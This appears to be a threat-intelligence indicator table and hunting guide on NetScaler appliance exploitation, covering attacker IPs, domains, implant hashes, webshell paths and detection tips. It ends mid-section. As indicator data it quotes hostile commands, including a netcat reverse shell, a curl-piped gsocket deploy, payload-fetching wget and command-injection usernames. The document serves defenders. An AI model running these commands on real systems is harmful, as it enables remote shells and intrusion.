| URL | http://64.94.85.67:443/update_result_3567cs.tgz | LevelBlue SpiderLabs (THOR team) [42] | Upload target for the archived /flash/nsconfig (attempted upload; LevelBlue does not confirm the data left) | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| File path | /tmp/update_result_3567cs.tgz | LevelBlue SpiderLabs (THOR team) [42] | Archive of /flash/nsconfig staged by update_c08937.pl, then deleted with the script itself; absence does not mean it did not run | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| File path | /var/netscaler/logon/LogonPoint/.local_journal | LevelBlue SpiderLabs (THOR team) [42] | PHP webshell (command execution, upload, download) installed by update_c08937.pl | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| File path | /var/netscaler/logon/LogonPoint/xua.html | LevelBlue SpiderLabs (THOR team) [42] | tar archive of /flash/nsconfig written into the web directory (configuration staging) | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| File path | /var/python/bin/customsnmpd | LevelBlue SpiderLabs (THOR team) [42] | Overwritten by main.py with a reverse shell; unexpected modification or execution is a lead | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| Account | sec_monitor | LevelBlue SpiderLabs (THOR team) [42] | Local superuser added to /flash/nsconfig/ns.conf by update_c08937.pl | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| URL alias | LogonUISimple.html.style.min.css | LevelBlue SpiderLabs (THOR team) [42] | CSS-looking alias (and hex variants) mapped in httpd.conf to the .local_journal webshell | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| Log string | pitboss PPE unexpectedly died NSPPE;whoami;# X | LevelBlue SpiderLabs (THOR team) [42] | Command-execution test in an authentication username | LevelBlue THOR hunt finding across its own customer environments; not independently confirmed. Use as a hunting pivot, not a blocklist. | Public blog, no TLP marking |
| File path | /var/tmp/.nsmon/.cfg | Arctic Wolf [36] | nsmon.pl configuration values | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| File path | /var/tmp/.nsmon/.state | Arctic Wolf [36] | nsmon.pl state file used to check whether a recorded process is still running | Arctic Wolf observation; a subset, not exhaustive. Beaumont says this follow-up activity is unrelated to the early-September actor. | Public GitHub repository, no TLP marking |
| URI path | /logon/LogonPoint/custom/receiver.min..css | Sygnia [37] | Request path as listed by Sygnia (two dots), consistent with the receiver.min.<hex>.css webshell alias | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| Log string | pitboss PPE unexpectedly died NSPPE; | Sygnia [37] | Sygnia confidence High: new command-injection variant | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| Log string | pitboss PPE missed too many heartbeats NSPPE; | Sygnia [37] | Sygnia confidence High: heartbeat loader variant | Sygnia investigation-derived, context-specific indicator, not Citrix-published. Validate ownership, NAT and direction before blocking. | Public advisory, no TLP marking |
| IPv4 | 195.123.233.245 | TENEX [38] | Primary Platypus C2 node (443); entretiensol.com and white-guard.pro resolve here | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| IPv4 | 38.180.81.157 | TENEX [38] | C2 node sharing the cluster certificate | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| IPv4 | 95.133.231.109 | TENEX [38] | C2 node sharing the cluster certificate | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| IPv4 | 104.200.67.56 | TENEX [38] | C2 node sharing the cluster certificate | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Domain | white-guard.pro | TENEX [38] | Resolves to the primary C2 node | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Domain | garyvard.com | TENEX [38] | Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Domain | hickoryusedauto.com | TENEX [38] | Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Domain | gurerasfalt.com | TENEX [38] | Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Domain | rockinroyaltykids.com | TENEX [38] | Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Domain | currydownsrvpark.com | TENEX [38] | Listed in the cluster certificate SANs; TENEX assesses it operator-associated with moderate confidence (a SAN entry alone does not prove control) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| TLS cert SHA-256 | 38b7c597c3f33f2caa2b2de9873f15cf9cb9984b0eacb801ef4b654a96ba9bd0 | TENEX [38] | Shared cluster certificate (subject platypus-ingress, issuer Platypus project default); ties the four C2 nodes together | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Cert URI SAN | platypus://server/default | TENEX [38] | Platypus framework certificate identity scheme; hunt by pattern, not only the exact fingerprint | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Signing key | S8GEj/Ibzw/Zy9Z5u4saQyn0h59enf9Mk3J2m70tTMs= | TENEX [38] | Ed25519/minisign public key embedded in every agent build; the best cross-build pivot | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Build fingerprint | 0.1.0-SNAPSHOT-4b91c7db | TENEX [38] | Newer agent build, compiled 2026-09-28 | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Build fingerprint | 0.1.0-SNAPSHOT-697ffe7c | TENEX [38] | Earlier agent build, compiled 2026-09-08, same operator signing key | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| SHA-256 | c98aee75c5e199c9b5527984ce48675d665963f7cab8ce9f2e82465de6b58727 | TENEX [38] | Platypus agent, freebsd/amd64 (the appliance-relevant build) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| SHA-256 | 89b64bd45478e53299f9c422cbba40fac3ac0712b551b85185e38203f7f984c6 | TENEX [38] | Platypus agent, linux/amd64 (current build) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| SHA-256 | be5832f3993ff63a36100b2f7b89c8d385e20dd9d72876700e7ade9fb9e6d4cb | TENEX [38] | Platypus agent, UPX-packed Linux x86-64; earlier build | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| SHA-256 | 0dcac605a3a0c37001552369a6a77003226b35ddee7710b554fcd0e6809a76d1 | TENEX [38] | Platypus agent, windows/amd64 | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| SHA-256 | 04db3fc44c81886844ef47949d7f352953a6bf1be4866be1fb3e7e12c452e3ac | TENEX [38] | Platypus agent, darwin/arm64 | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| SHA-256 | 2d2c2f6842982f7e1cb894ce915d39f2a9861009c7ecb1b90da803f2c3c608f4 | TENEX [38] | Platypus agent, linux/amd64 unpacked (more stable than the packed hashes) | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| HTTP request | POST /api/v1/agents/enroll with Content-Type application/x-protobuf-platypus-v2 | TENEX [38] | Platypus agent enrollment; the content type is highly distinctive | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| URI path | /api/v1/agent/link | TENEX [38] | Platypus WebSocket tasking channel over mutual TLS | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Network fingerprint | _platypus-mesh._tcp (mDNS, UDP/5353) | TENEX [38] | LAN peer discovery in cleartext; the easiest way to find a second infected host on the same segment | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| User-Agent | platypus-agent/public-ip-probe | TENEX [38] | Platypus agent public-IP probe | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| File path | /netscaler.local/ | TENEX [38] | Operator-created binary directory, not part of the stock NetScaler layout | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| File name | ns_*.pl | TENEX [38] | Agent renamed as a NetScaler-style Perl script; the number is per install, so hunt the pattern and check content | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| File path | /var/core/.ns-cache/ (client.crt, client.key, agent.lock, state.db) | TENEX [38] | Agent working directory; the client certificate and key exist only if enrollment completed, and they survive a firmware upgrade | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| Username | scanner-probe | TENEX [38] | Submitted to the authentication virtual server for reconnaissance just before the injection attempts | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| File path | /.x | TENEX [38] | Stager written by the injected shell-loader command and then run with sh | TENEX incident observation, recovered from the operator's own servers. Appliance telemetry showed the injection reaching the handler, not that commands ran. The operator rebuilds, so hashes are short-lived. | Public blog, no TLP marking |
| IPv4 | 199.233.217.13 | TENEX [38] | Check-in over TCP/8080 (/hi, /hi/<ip>) and a netcat reverse shell to TCP/8000 | TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator. | Public blog, no TLP marking |
| IPv4 | 130.94.20.222 | TENEX [38] | Silent beacon to :8888/c/<hex> | TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator. | Public blog, no TLP marking |
| Command | nc 199.233.217.13 8000 -e /bin/sh | TENEX [38] | Netcat reverse shell | TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator. | Public blog, no TLP marking |
| Command | curl http://199.233.217.13:8080/hi/ | TENEX [38] | Attacker check-in to fresh infrastructure | TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator. | Public blog, no TLP marking |
| Command | curl -m 8 -sk http://130.94.20.222:8888/c/<hex> -o /dev/null | TENEX [38] | Silent beacon that confirms reachability without saving output | TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator. | Public blog, no TLP marking |
| Command | bash -c $(curl -fsSL https://gsocket.io/y) | TENEX [38] | One-line Global Socket Toolkit deploy with an S=<hex> key. gsocket.io is a legitimate service abused here, so do not block the domain | TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator. | Public blog, no TLP marking |
| Command | whoami; id>/netscaler/ns_gui/vpn/id009.txt; id>/netscaler/ns_gui/id009.txt | TENEX [38] | Execution check that writes id output to a web-readable appliance path | TENEX opportunistic wave after the public PoC; unattributed commodity tooling, not tied to the Platypus operator. | Public blog, no TLP marking |
| File path | /var/tmp/watchTowr | watchTowr Detection Artefact Generator [29] | README example output path of the CVE-2026-88771 detection tool (id>/var/tmp/watchTowr) | Test marker from a public watchTowr detection tool (README example path). A hit means someone ran the tool, possibly a defender, not necessarily an attacker. The operator can choose any path. | Public GitHub repository, no TLP marking |
| File path | /tmp/watchTowr | watchTowr Detection Artefact Generator [31] | README example output path of the CVE-2026-88772 (DTLS) detection tool; the example writes a 7-byte file | Test marker from a public watchTowr detection tool (README example path). A hit means someone ran the tool, possibly a defender, not necessarily an attacker. The operator can choose any path. | Public GitHub repository, no TLP marking |
| Log string | pitboss PPE unexpectedly died NSPPE;printf wt88771mbw9drneqklf>/var/netscaler/logon/themes/wt88771mbw9drneqklf.txt;# X | r/Citrix [109] | Injected username that writes a marker file into the logon themes directory (execution test) | Single Reddit commenter, unverified. The wt88771 prefix with a random suffix looks like a detection canary, but it does not appear in watchTowr's published tool or write-up, so do not attribute it to watchTowr. Treat as a hunting lead. | Public Reddit comment |
| File path | /var/netscaler/logon/themes/wt88771mbw9drneqklf.txt | r/Citrix [109] | Marker file created by the command above; hunt for wt88771*.txt under /var/netscaler/logon/themes/ | Single Reddit commenter, unverified. The wt88771 prefix with a random suffix looks like a detection canary, but it does not appear in watchTowr's published tool or write-up, so do not attribute it to watchTowr. Treat as a hunting lead. | Public Reddit comment |
| Log string | pitboss PPE unexpectedly died NSPPE;wget http://31.56.197.72:9090/lula;# X | r/Citrix [109]; LevelBlue SpiderLabs (THOR team) [42] | Payload retrieval from 31.56.197.72, also described by LevelBlue; the same host appears in the Arctic Wolf and TENEX data | Single Reddit commenter, unverified. The wt88771 prefix with a random suffix looks like a detection canary, but it does not appear in watchTowr's published tool or write-up, so do not attribute it to watchTowr. Treat as a hunting lead. The wget line itself matches LevelBlue's published example. | Public Reddit comment |
| IPv4 | 213.209.159.55 | Beaumont, Oct 2 19:01 UTC [74]; VirusTotal [58]; Poppelgaard [39] | Named as the payload server in screenshots of a write-up attached to the Beaumont post (author not named): crafted SAML-factor usernames on two 14.1-73.37 appliances made them fetch a payload from it over plain HTTP on TCP 443 (paths under /t/), save it as /v and run it. The incoming request source was not identified. The Poppelgaard checker calls it the exfiltration host of the SAML-attack dropper "380d56" (2 Oct, community analysis). A VirusTotal community comment also says a Perl payload related to NetScaler exploits is hosted on this IP. AS208137, Feo Prest SRL, Germany. | Unverified. The write-up itself says it shows exploitation attempts and correlated crashes, not confirmed command execution, a specific CVE or a firmware regression. No vendor or CERT has confirmed it. The payload-vs-exfiltration role differs between the two sources; each is single-source. Either role means an infected appliance would connect out to this host, so it is kept in this site's IPv4 edge blocklist as defence in depth. | Public Mastodon post (screenshots) |
| SHA-256 | b9b0a4380db462c706597bd3e6a08d4d99fcbbf0919d63eb99b488d396c8ce63 | VirusTotal [58] | Perl script (24.57 KB), first submitted to VirusTotal on 2 Oct at 17:29 UTC. THOR (Nextron) commented a Valhalla rule match, MAL_EXPL_CVE_2026_88771_Oct26 (detects a CVE-2026-88771 post-exploitation script), and a community comment says it is a NetScaler exploit payload hosted on 213.209.159.55. Shared in the w00w00 tlp-amber-citrix-du-jour thread 3 Oct ("i don't see it in the pitscaler IOC list"). Re-checked 3 Oct 16:14 UTC: 4 of 75 engines flag it (UDS:Backdoor.Win32.Tofsee, Win32.Hack.Tofsee.a, Backdoor.Perl!9.85243, Kaspersky HEUR:Backdoor/Perl.WebShell.b) | Still the weaker of the two payloads: four heuristic/backdoor labels, no engine names the NetScaler campaign, and no public report ties this hash to f.pylrk.cc or the Sliver implant - it came from a different delivery host (213.209.159.55). The file content was not reviewed here, and no vendor report names it. | Public VirusTotal page |
| SHA-256 | 0188b0eba4b01c4fb838df9d1d76c76d7f1dc22897e25161975b606c134c1027 | External malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59] | Sliver C2 implant built for FreeBSD (the OS under NetScaler): statically linked stripped Go ELF64, 8,822,784 bytes, MD5 117ba08492fe68726dae74b40d375c28. Served over HTTPS from f.pylrk.cc/HaKi2ufpiQ8AeVTZ/host (HTTP/2 200, application/octet-stream, Cloudflare-fronted; re-verified live 3 Oct). Hardcoded C2 https://www.pylrk.cc, protocol tag pylrkfbsd, IMPLANT_CAPABILITY_TUNNEL_TERMINAL_V1 (reverse shell/tunnel), spoofed Chrome 108/Windows User-Agent for its own beacons, no embedded IP. VT filenames include /var/tmp/.host, /private/var/tmp/.host and citrix3.bad - appliance deployment paths. 31 of 75 engines on VirusTotal (3 Oct 14:25 UTC), all Sliver/Vilers-family labels; first submitted 2 Oct 11:49 UTC. A TLP:CLEAR malware analysis report (2 Oct) ties it to CVE-2026-88771 exploitation of a NetScaler Gateway, corroborated by an Expel IR observation; Expel reported netcat-style reverse callbacks in the same campaign. | Vendor-independent: an external team's static analysis (sample not executed), plus Expel corroboration - strong for this campaign, but not a vendor or CERT publication. Detection labels are all Sliver/Vilers; the FreeBSD build and pylrk.cc C2 are what tie it here. Cloudflare fronts the delivery host, so block the domain and hash, not the IPs. | Public VirusTotal page and TLP:CLEAR report |
| URL path | /HaKi2ufpiQ8AeVTZ/host | External malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59] | Delivery path of the FreeBSD Sliver implant on f.pylrk.cc:443 (HTTPS, HTTP/2 200, application/octet-stream, 8,822,784 bytes); live and unchanged 3 Oct, per the TLP:CLEAR malware analysis report and re-verified directly | Path is random-looking and may rotate; hunt it in proxy logs together with the f.pylrk.cc hostname. A negative result proves nothing - the file may be served from other paths. | Public VirusTotal page and TLP:CLEAR report |
| File path | /var/tmp/.host (and /private/var/tmp/.host) | External malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59] | Filename VT records for the FreeBSD Sliver implant, consistent with deployment on a NetScaler/FreeBSD appliance; citrix3.bad is another recorded name | From VT filename metadata and the external report, not from IR on a victim appliance; a missing file does not rule out compromise. /tmp and /var/tmp clear on reboot. | Public VirusTotal page and TLP:CLEAR report |
| Domain | pylrk.cc | Poppelgaard [40]; Poppelgaard [39]; Beaumont, Oct 2 19:01 UTC [74]; External malware analysis report (TLP:CLEAR, 2 Oct) [41] | C2 and payload-delivery domain: registered 2 Oct 06:56 UTC (NameSilo, Cloudflare NS). Poppelgaard reported it as a download server seen in attack attempts on 2 Oct (article and checker release 1.11). The FreeBSD Sliver implant served from f.pylrk.cc carries a hardcoded C2 reference to https://www.pylrk.cc and resolves its C2 via this domain (TLP:CLEAR malware analysis report, corroborated by Expel). The write-up screenshotted in the Beaumont post spells it *.pyrlink.cc in an edit ("Block that too"), but that domain is not registered; the screenshots also do not name the delivery host, so the two spellings may describe the same host. Passive DNS shows f.pylrk.cc A records from 2 Oct 11:50 UTC on Cloudflare proxy IPs (104.21.30.48 / 172.67.150.149); www.pylrk.cc also resolves there, the apex has no A record. Re-checked live 3 Oct. | Malware-role now multi-source (checker, MAR, Expel corroboration, embedded C2 string in the implant). VirusTotal: 1 of 91 engines flags the apex and f.pylrk.cc - weak as always on fresh infrastructure. The spelling *.pyrlink.cc from the screenshots is unregistered. Cloudflare-fronted: block the domain name, not the resolved IPs (shared with millions of sites). | Public blog, GitHub release and TLP:CLEAR report |
| Domain | f.pylrk.cc | External malware analysis report (TLP:CLEAR, 2 Oct) [41]; VirusTotal [59] | Payload-delivery subdomain of pylrk.cc: served the FreeBSD Sliver implant (8,822,784 bytes) at /HaKi2ufpiQ8AeVTZ/host over HTTPS, per the TLP:CLEAR malware analysis report (2 Oct, corroborated by Expel) and the report author's Slack post ("I get a different payload from https://f.pylrk[.]cc/HaKi2ufpiQ8AeVTZ/host"). First seen in passive DNS 2 Oct 11:50 UTC on Cloudflare proxy IPs; Let's Encrypt certificate CN=pylrk.cc issued 2 Oct 06:01 UTC; still serving 3 Oct (re-verified). Root path returns a minimal placeholder page (<h1>c</h1><p>ok</p>). | Multi-source and independently verifiable, but vendor-independent - not a vendor or CERT publication. Cloudflare-fronted: block the hostname, never the proxy IPs. Subdomains under pylrk.cc may rotate; hunt *.pylrk.cc in DNS logs rather than this single host. | Public VirusTotal page and TLP:CLEAR report |
| Domain | oast.fun | Poppelgaard [39] | Domain in the Poppelgaard checker v1.11 DNS-hunt list (14 domains); the checker does not state which source observed it or what it served | Low confidence and dual use: oast.fun is a known out-of-band-testing domain family used by security tooling (Interact.sh-style OAST callbacks), so a hit can be a researcher's or pentester's test, not the actor. Hunting lead only; do not block without context. | Public GitHub repository, no TLP marking |
| Domain | dnsl.cc | Poppelgaard [39] | Domain in the Poppelgaard checker v1.11 DNS-hunt list (14 domains); the checker does not state which source observed it or what it served | Single compiled list; no public source describes this domain's role in the campaign. A short generic domain whose ownership is privacy-redacted. Hunting lead only. | Public GitHub repository, no TLP marking |
| Domain | gs.thc.org | Poppelgaard [39]; TENEX [38] | Domain in the Poppelgaard checker v1.11 DNS-hunt list (14 domains); the checker does not state which source observed it or what it served | Low confidence and dual use: thc.org subdomains are associated with the Hacker's Choice gsocket reverse-shell tooling, which is used by both penetration testers and attackers (TENEX lists gsocket in the same campaign - see the gsocket rows). A hit needs correlation with other indicators before it means anything. Hunting lead only. | Public GitHub repository, no TLP marking |
| File path | /v | Beaumont, Oct 2 19:01 UTC [74]; Poppelgaard [40] | Payload file the injected commands save at the filesystem root and execute (same write-up) Poppelgaard separately describes a bot sending fetch -qo /v with an http URL on port 443 and then sh /v, using IFS instead of spaces. | Unverified. A missing /v does not rule out earlier execution or cleanup, as the write-up itself notes. | Public Mastodon post (screenshots) |
| URI path | /t/ | Beaumont, Oct 2 19:01 UTC [74]; Poppelgaard [40] | Paths under /t/ on 213.209.159.55:443 (plain HTTP) used for the payload downloads Poppelgaard describes the same /t/<hex> download path from a bot. | Unverified, single write-up. A short generic path, so only meaningful together with the IP. | Public Mastodon post (screenshots) |
| File name | nsaaad-*.gz | Beaumont, Oct 2 19:01 UTC [74] | Core dumps of the authentication daemon in recently modified numbered directories under /var/core after repeated crashes (exit status 0x8a, restart limit 6, then a reboot) | Unverified. Crashes have other causes; a match is a reason to preserve logs and cores and involve Citrix Support, not proof of compromise. | Public Mastodon post (screenshots) |
| File path | /nsconfig/.slap/ and /flash/nsconfig/.slap/ | Poppelgaard [39] | Perl agent/bridge directory of the kit the SAML attack tries to install (dropper "380d56", community analysis per the Poppelgaard checker v1.10); persists across reboots | Single-source community analysis compiled in the Poppelgaard checker; no vendor or CERT has published these paths. A hunting lead, not proof of compromise. | Public GitHub repository, no TLP marking |
| File path | /var/tmp/.ux/ | Poppelgaard [39] | Staging directory for slapshot.py (listens on 127.0.0.1:9909) and whipd.py (listens on 0.0.0.0:9910) of the SAML-attack kit per the Poppelgaard checker v1.10 | Single-source community analysis compiled in the Poppelgaard checker; no vendor or CERT has published these paths or ports. Local-only ports can be legitimate; correlate with the other kit artefacts. | Public GitHub repository, no TLP marking |
| File name | .slap.receiver / .ctxs.receiver / receiver.deb in LogonPoint/custom | Poppelgaard [39]; GreyNoise blog [53] | PHP webshell variants of the SAML-attack kit (fake 404 responses, command in a cookie, fixed token), with a receiver.v2.min[.<hex>].css alias and an /etc/httpd.conf.slap.bak config backup, per the Poppelgaard checker v1.10 | Single-source community analysis compiled in the Poppelgaard checker. Overlaps the publicly documented .ctxs.receiver webshell; treat new variants as leads and match on file content, not names. | Public GitHub repository, no TLP marking |
| File path | /var/tmp/.slap-agent.log, .slap-httpd-test.log, .slap-diag.txt, .s2loot, /tmp/.slap.cron | Poppelgaard [39] | Log and staging artefacts of the SAML-attack kit per the Poppelgaard checker v1.10; persistence via rc.netscaler and root crontab (agent every minute, .slap/boot.sh every 5 minutes) | Single-source community analysis compiled in the Poppelgaard checker; no vendor or CERT has published these artefacts. A hunting lead. | Public GitHub repository, no TLP marking |
| SHA-256 | 72cff13fcba75504485e94fa6bfc5e9363e860f49efdba68feb583148eec38f2 | Poppelgaard [39] | Dropper "380d56" of the SAML-attack kit, listed in the Poppelgaard checker v1.10 (community analysis). VirusTotal on 2 Oct: Perl file, 1 of 75 engines malicious | Single-source community analysis; no vendor or CERT has confirmed the hash, and the VirusTotal score is weak evidence (one heuristic label, 1/75). | Public GitHub repository, no TLP marking |
| Config pattern | add authentication samlAction.* | Citrix community blog [2] | Citrix: an appliance with this line in its configuration is affected by the new SAML issue, per the applicability check in Citrix's guidance | Applicability check from Citrix, not an indicator of compromise. | Public vendor blog, no TLP marking |
| Config pattern | add authentication samlIdPProfile.* | Citrix community blog [2] | Citrix: an appliance with this line in its configuration is affected by the new SAML issue, per the applicability check in Citrix's guidance | Applicability check from Citrix, not an indicator of compromise. | Public vendor blog, no TLP marking |
| Log pattern | proc nsaaad.*(SIGNALED|EXITED)|maximum number of restarts|Pitboss declaring system failure|All monitored processes have exited, rebooting | Beaumont, Oct 2 19:01 UTC [74] | Grep from the Beaumont post for authentication-daemon crashes and the resulting restart or reboot, run against /var/log/ns.log | Beaumont own pattern. A match means the daemon crashed or the appliance restarted, which has other causes too; it is not proof of an attack. | Public Mastodon post |
The 2 October SAML-issue payload chain: f.pylrk.cc and the FreeBSD Sliver implant
A TLP:CLEAR malware analysis report (2 October, vendor-independent, corroborated by an Expel IR observation) and the delivery host's live state connect the new-issue delivery domain to an actual implant:
pylrk.ccwas registered on 2 Oct at 06:56 UTC (NameSilo, Cloudflare nameservers); the delivery subdomainf.pylrk.ccfirst appears in passive DNS at 11:50 UTC with a Let's Encrypt certificate (CN=pylrk.cc) issued at 06:01 UTC.f.pylrk.cc/HaKi2ufpiQ8AeVTZ/hostserved an 8,822,784-byte Go ELF64 binary over HTTPS (HTTP/2 200, application/octet-stream, Cloudflare-fronted). Still live and unchanged on 3 October.- The binary is a Sliver C2 implant compiled for FreeBSD - the OS under NetScaler - with a hardcoded C2 reference to
https://www.pylrk.cc, a custom protocol tagpylrkfbsd, tunnel/reverse-shell capability (IMPLANT_CAPABILITY_TUNNEL_TERMINAL_V1), a spoofed Chrome 108/Windows User-Agent for its own beacons, and no embedded IP (C2 resolves via DNS). - VirusTotal: 31 of 75 engines detect it, all Sliver/Vilers-family labels; first submitted 2 Oct 11:49 UTC; recorded filenames include
/var/tmp/.hostandcitrix3.bad- appliance deployment paths. - A separate Perl-script payload (3-4 of 75 engines) is associated with
213.209.159.55, not with f.pylrk.cc; the two delivery chains are distinct in the public reporting.
The report is a static analysis (sample not executed) by an external team, not a vendor or CERT publication. Cloudflare fronts the delivery host: block the domain names and the hash, never the resolved proxy IPs. Hunt *.pylrk.cc in DNS logs rather than the single hostname - subdomains may rotate. [41]
Post-exploitation steps attempted on a GreyNoise sensor
GreyNoise says the attacker did not gain a foothold on its sensor. The steps below show the attacker's playbook, not a successful compromise.
- Set setuid and setgid on
/bin/sh. - Planted a PHP webshell that authenticates by cookie.
- Killed and restarted httpd, for anti-forensics or to activate the changed config.
A Reddit user described one sample of the .ctxs.receiver file, and IFIN relayed the description. This is unconfirmed. [57]
- The file is a 237-byte PHP one-liner.
- It runs a URL-decoded cookie value through
passthru(), but only when a second cookie matches a hardcoded 16-character hex token. - NetScaler uses both cookie names legitimately, so the traffic blends in.
- The file survived a reboot and the upgrade to 14.1-73.37.
The token likely differs per victim, so search the file's content rather than relying on its hash.
Source: GreyNoise, "Swarming Against Citrix 0-Day Exploitation". Victim-specific names and IPs from later IR-vendor writeups are deliberately left out. Beaumont warns that publishing them exposes organisations that have not yet remediated. [70]
Detection and hunting for NetScaler compromise
In short: review httpd.conf for PHP handler and AliasMatch changes, look for PHP files in VPN script and media directories, check /bin/sh for setuid, and correlate DTLSv1.0 handshake failures with NSPPE crashes. Sources: GTIG/Mandiant, CERT-EU and GreyNoise, as of 30 September 2026. [34][27]
A clean scan does not clear a host. A checker can miss a planted webshell, especially when logs have rotated or permissions were changed.
TENEX: finding the Platypus agent Network and host
- On the appliance:
